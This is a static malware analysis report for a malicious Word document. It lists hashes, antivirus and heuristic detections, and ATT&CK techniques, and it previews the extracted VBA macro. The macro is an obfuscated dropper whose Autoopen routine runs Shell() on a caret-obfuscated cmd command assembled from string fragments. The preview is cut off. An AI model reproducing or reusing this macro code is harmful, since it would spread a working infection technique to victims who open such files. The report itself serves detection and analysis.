Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8c1195973cc97a31…

MALICIOUS

Office (OLE)

97.8 KB Created: 2018-06-04 12:44:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: a94da67c15dd32940721041dddafc486 SHA-1: 685b174a920b66999b88796494bbcee249c3231a SHA-256: 8c1195973cc97a312e247d3f18441b5188134f85fe04fde608229bb27dc9b909
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the execution of a shell command, which is highly indicative of a downloader or droppper functionality. The macro's obfuscated nature and the presence of a Shell() call suggest it is designed to fetch and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6578629-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6578629-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18076 bytes
SHA-256: 52db9b90e6da99066eeaf358fcefd3a9b9c1be4077cfc3f5fed9a4e0b47e6584
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DbTAiYloZzmu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ahbFTYD()
On Error Resume Next
For OfTswp = opKsRw To 30475
         FtBZI = (nUjms - ChrW(14360 * 33928) * YiIMf * CInt(TChCP + Sqr(74898)) + 83975 - 21322 / 87641 - CDate(iFPoVl - 59426 + 86375 - Hex(oaKmFE / 65412)) + (jRcjE * Tan(JlDMz)))
Next
For VNcbF = mrdmm To 6580
         brfIP = (zhbKtQ - ChrW(83984 * 57294) * FCRZfi * CInt(azjhB + Sqr(34748)) + 81069 - 65832 / 89476 - CDate(ZTdZid - 76159 + 70904 - Hex(cuCjK / 26641)) + (zmbUNY * Tan(LQhYia)))
Next
ahbFTYD = HalhShlkRbR + Shell(pMEhBRbK + Chr(qdiEFPZI + vbKeyC + iiOGmPsm) + hzAivtXzN + jzcwnhuAWr + lzHrhH + KsCUYtnW + lrdbbXw + lOJuuwmYWFj + tuGuLUkZ, PluSm + 0 + IbNdtEBw)
For rtQOrY = PbZio To 56253
         VYOZT = (UEHaSB - ChrW(73351 * 35006) * wEFKW * CInt(BmUSpa + Sqr(65612)) + 20563 - 3784 / 81002 - CDate(ubpsS - 97729 + 29064 - Hex(Lnlqwq / 73479)) + (GiUZdG * Tan(UmuHd)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For mtFjt = KcQiG To 80719
         LwPwY = (DsbjhQ - ChrW(89882 * 77052) * VFYrl * CInt(YtjGCk + Sqr(52627)) + 11117 - 80549 / 220 - CDate(jSvVE - 80782 + 41681 - Hex(aIKNXT / 97753)) + (DGKFO * Tan(NmFiq)))
Next
ahbFTYD
For rbmlj = hcslR To 30468
         LKqNj = (nDSXz - ChrW(59577 * 89381) * iFJQVz * CInt(owWZj + Sqr(7523)) + 72234 - 42891 / 49136 - CDate(pvCCu - 44276 + 47592 - Hex(ZCRYE / 75158)) + (lUCXj * Tan(vPCWL)))
Next
End Sub


Attribute VB_Name = "ozFBhtFKjr"
Function hzAivtXzN()
On Error Resume Next
For JpQNAs = RTJBj To 401
         diwHL = (nzaAKE - ChrW(21509 * 66084) * wRXvN * CInt(Rkkbb + Sqr(19304)) + 46571 - 4732 / 35718 - CDate(ikWjC - 27178 + 71431 - Hex(lpJPP / 6094)) + (joQWsi * Tan(moMwOf)))
Next
qMskQX = "md WtdSC" + "ibhsch TstcAoCJ" + "wNFwEShPQi o" + "fiwf" + "Aq"
For pPzHzj = owwij To 10837
         YCBUh = (uVHfaY - ChrW(86340 * 96193) * XEzFjv * CInt(MHSWb + Sqr(84935)) + 80889 - 33536 / 77778 - CDate(YaOmK - 56251 + 63690 - Hex(qTHRhZ / 75879)) + (Hbuib * Tan(OwpuC)))
Next
pLUBbJ = "jcHC &    " + " %^c^o^m^" + "S^p^E^c^%" + "    " + " %" + "^c^" + "o^m^S^p^E^c" + "^%     /V " + "       " + " /c           s"
For ECfqr = zSjuM To 51911
         FqcRv = (sjFlPW - ChrW(10731 * 70171) * LPzQa * CInt(unoRa + Sqr(34842)) + 50045 - 40318 / 73945 - CDate(OTQVh - 74129 + 63661 - Hex(TKbzRQ / 37821)) + (izGTzw * Tan(vLDoA)))
Next
iJGpTjjYXcC = "et %NLzHM" + "JoWj" + "FiCZj" + "Y%=wLtRcu" + "HTn"
For ISOTY = CpPSZ To 66666
         zQvvW = (zpnaO - ChrW(35969 * 27994) * TUKiw * CInt(ZKrMjs + Sqr(29713)) + 32207 - 92693 / 29519 - CDate(hluzkA - 31024 + 62796 - Hex(CfVrA / 748)) + (jjUEn * Tan(BdmYiO)))
Next
oCwNWuwd = "J&&set %h" + "uHojGaa" + "AJGAPS" + "%=p&&set %om" + "AzmVbC" + "aQJXvN%" + "=o" + "^w&&s" + "et %wzA"
For IhsYuj = TSjTuz To 65757
         upzMfi = (hbKsHj - ChrW(34021 * 23698) * RBCHV * CInt(wzUSqQ + Sqr(1143)) + 2140 - 20690 / 80473 - CDate(WizZWi - 91748 + 54251 - Hex(RNBYw / 4033)) + (XBsva * Tan(HsBsN)))
Next
HpNuSNql = "wV" + "hSuzuzwGYb%=wU" + "KdIQ" + "GfrViqaT&&set " + "%QCbZHpB" + "B%=" + "!%huHojGa" + "aAJGAPS%!" + "&&set %Ed"
For PjazDO = jOmvS To 13417
         VUiwvU = (KczSuS - ChrW(25308 * 51285) * XdVDM * CInt(rOzJl + Sqr(36643)) + 83282 - 72441 / 11724 - CDate(ouonJF - 94423 + 85779 - Hex(EDahI / 93823)) + (IKORwD * Tan(BdUwl)))
Next
BBtJDsAXQRj = "UCNqWkjzk" + "fjdV" + "%=EVpiwmJ&&" + "set" + " %fHhbhMOZj" + "wKvTN%=e^r" + "&&set %"
hzAivtXzN = qMskQX + pLUBbJ + iJGpTjjYXcC + oCwNWuwd + HpNuSNql + BBtJDsAXQRj
End Function
Function jzcwnhuAWr()
On Error Resume Next
For VTrtrG = YnuSj To 55810
         IPQjp = (mKhWo - ChrW(56151 * 71632) * nJpGLJ * CInt(lMhpCZ + Sqr(51781)) + 40136 - 29111 / 93608 - CDate(TCKlMo - 17893 + 46188 - Hex(KmUEOU / 92119)) + (dFLUTS * Tan(Diqno)))
Next
iFOMGhq = "BqG" + "VBqOzbUhB%=!%o" + "mAzmVb" + 
... (truncated)